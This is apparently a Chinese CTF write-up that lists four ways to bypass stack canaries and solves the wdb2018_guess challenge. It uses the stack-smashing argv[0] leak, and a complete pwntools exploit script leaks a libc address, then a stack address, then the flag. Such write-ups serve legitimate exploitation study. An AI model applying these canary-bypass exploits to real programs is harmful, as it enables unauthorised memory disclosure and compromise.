本篇记录绕过canary的方法
文章目录
前言
canary的绕过方法一共有4种
①通过read函数泄露canary。关键的一点就是read函数读取字符串的时候不会在末尾加上“\x00”,这就是gets函数不能用来泄露canary的原因(有些输出函数遇到‘\0’会截断)。
②暴力破解canary。这种方法利用起来有限制,就是一般要程序中有fork函数创造出子进程,因为子进程是父进程复制出来的,所以canary也就跟父进程相同,在子进程中覆盖canary后报错就会退回到父进程,此时canary的值是不会改变的。
③劫持stackchkfail。因为canary被覆盖的时候会调用这个函数,所以如果我们可以利用程序中的漏洞(比如格式化字符串)改got表中stackchkfail的地址为one_gadget的地址就能getshell。
④stack smashing 利用stackchkfail的报错信息。在报错信息中,会将你发生栈溢出的程序名调用输出,其位置位于argv[0],我们可以将argv[0]的地址改写为我们想要获取的内容的地址,使它随着错误提示一起输出。
stack_end在utf8那里 函数是__environ
wdb2018_guess
stack smashing
有趣的题目,本题fork了三次,创建了3个子进程,那么就会gets三次
fork的问题看这里
利用三次gets和canary,我们可利用stack smash来获得三次信息
第一次获得libc,第二次获得栈地址,第三次获得flag
覆盖argv[0],也就是程序名所在的位置(注意main的参数是从右至左入栈的,但是argv中有一个参数不一致,那就是stack_end,他是用来分隔一般栈的内容和argc,argv,envp之类的内容的,所以他会在argc之前,看了一下值好像都是0x1c,暂时不解)
先用puts的got来获得libcbase,用libcbase获得environ的地址,也就是envp[0]的地址(用i stack, p environ命令查看)
一般情况:
程序名
0
envp[0]
然后第二次输入通过environ来获得stack的地址
第三次就可以通过flag的地址来获得flag了
exp:
from pwn import *
from LibcSearcher import *
local_file = './GUESS'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26816)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
p = 'a'*0x128 + p64(elf.got['puts'])
sla('Please type your guessing flag', p)
ru('*** stack smashing detected ***: ')
fun_addr = uu64(rc(6))
info('fun_addr', fun_addr)
libc = LibcSearcher('puts', fun_addr)
libc_base = fun_addr - libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')
info('libc_base', libc_base)
info('environ_addr', environ_addr)
p = 'a'*0x128 + p64(environ_addr)
sl(p)
ru('*** stack smashing detected ***: ')
stack_addr = uu64(rc(6))
info('stack_addr', stack_addr)
p = 'a'*0x128 + p64(stack_addr - 0x168)
sl(p)
r.interactive()